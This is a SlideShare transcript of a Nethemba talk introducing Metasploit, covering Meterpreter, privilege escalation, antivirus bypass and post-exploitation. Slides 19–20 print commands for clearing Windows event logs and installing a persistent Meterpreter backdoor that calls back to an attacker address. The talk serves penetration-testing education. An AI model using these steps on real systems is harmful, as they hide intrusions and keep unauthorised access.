Nethemba metasploit

4,031 views
4,228 views

Published on

Published in: Lifestyle
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
4,031
On SlideShare
0
From Embeds
0
Number of Embeds
2,096
Actions
Shares
0
Downloads
27
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Nethemba metasploit

  1. 1.          www.nethemba.com            www.nethemba.com       Exploitation with Metasploit Nethemba s.r.o. Norbert Szetei, CEH norbert.szetei@nethemba.com
  2. 2.          www.nethemba.com        Prologue  Metasploit Project  Metasploit Framework – open­source platform  for exploit developing, testing and using exploit  code  Metasploit Express, Metasploit Pro, NeXpose
  3. 3.          www.nethemba.com        What else?  Passive or active exploits  Linux / Mac OS X / Windows / IRIX / HPUX /  Solaris  IPS/IDS testing  Different communication channels
  4. 4.          www.nethemba.com        History of Metasploit  1.0 (2003­2004) PERL, 15 exploits, project  started by HD Moore  2.7 (2003­2006) PERL, more than 150 exploits  3.+ (2007­today) Ruby, 628 exploits  Currently 18 active developers  Code contribution from hundreds of people
  5. 5.          www.nethemba.com        Fundamental Parts  Interfaces (Console, CLI, ...)  Libraries (Rex, MSF Core, MSF Base)  Plugins (db support, wmap, xmlrpc, ...)  Tools (mostly external usage)  Modules (Exploits, Auxiliaries, Payloads,  Encoders, Nops)
  6. 6.          www.nethemba.com        Metasploit testing environment  Virtual machines laboratory  Metasploitable  Remove your Windows updates  Hacking the web browsers  Become a hac.. penetration tester
  7. 7.          www.nethemba.com        Simple Usage  exploits (check), auxiliaries  payloads (singles, stagers, stages)  portscan, db_autopwn  generating payloads  meterpreter, vncinject (full control over user)  msfencode, msfpayload
  8. 8.          www.nethemba.com        Meterpreter  Injection into DLL  Reverse connections  Core commands  Stdapi commands  Priv commands
  9. 9.          www.nethemba.com        Meterpreter ­ STDAPI  File System commands  Networking commands  System commands  User interface commands  Keylogging
  10. 10.          www.nethemba.com        Meterpreter ­ Priv  System Elevation: Named Pipe Impersonation Token Duplication KiTrap0D  hashdump  timestomp (MACE)
  11. 11.          www.nethemba.com        Meterpreter ­ Priv  System Elevation: Named Pipe Impersonation Token Duplication KiTrap0D  hashdump  timestomp (MACE)
  12. 12.          www.nethemba.com        Can a firewall protect us? ● Attacks on layer 7 ● Botnets ● Social Engineering + Phishing (SET) ● PassiveX ● IDS Detection ­> SSL Encryption
  13. 13.          www.nethemba.com        Passive X ● Modifies registry on Windows to permit loading  untrusted ActiveX ● Loads stage ActiveX control from MSF web  server ● Loads stagers (Meterpreter, VNC) via HTTP  tunnel ● Unfortunately it works in IE6 only
  14. 14.          www.nethemba.com        Reflective DLL Injection  Loading of a library from memory into a host  process  Library is responsible for loading itself by  implementing a minimal Portable Executable  (PE) file loader  Minimal interaction with the host system and  process  Difficult detection of the DLL
  15. 15.          www.nethemba.com        Integration with third party apps ● Nessus ● NeXpose ● (Ratproxy) WMAP Web Scanner ● (Aircrack) Karmetasploit
  16. 16.          www.nethemba.com        Exploit development ● pattern_create.rb, pattern_offset.rb ● porting exploits ● SEH exploitation, msfpescan ● msfelfscan, msfmachscan ● irb, framework for exploits development
  17. 17.          www.nethemba.com        Exploitation on the Client Side ● Binary Payloads ● Trojan Infection ● PDF ● Java Applet ● VBScript ● Antivirus bypass
  18. 18.          www.nethemba.com        msfencode ● msfpayload for raw payload generation ● Msfencode ­x  Specify an alternate win32 executable template ● Injection into an existing executable, the same  functionality
  19. 19.          www.nethemba.com        Post Exploitation ● PSExec (windows/smb/psexec) ● Covering your tracks (event logs) log = client.sys.eventlog.open('system')  log.clear ● Sniffing (meterpreter, auxiliaries)
  20. 20.          www.nethemba.com        Maintaining access ● Persistent Meterpreter Service run persistence ­X ­i 15 ­p 3443 ­r 192.168.64.3 ● Meterpreter Backdoor Service metsvc ­h
  21. 21.          www.nethemba.com        Epilogue If you think technology can solve your security  problems, then you don't understand the  problems and you don't understand the  technology.  (Bruce Schneier)
  22. 22.          www.nethemba.com        References ● http://www.metasploit.com ● http://www.offensive­security.com/ ● svn co  https://www.metasploit.com/svn/framework3/trunk/
  23. 23.          www.nethemba.com        Any questions? Thank you for listening Norbert Szetei, CEH

×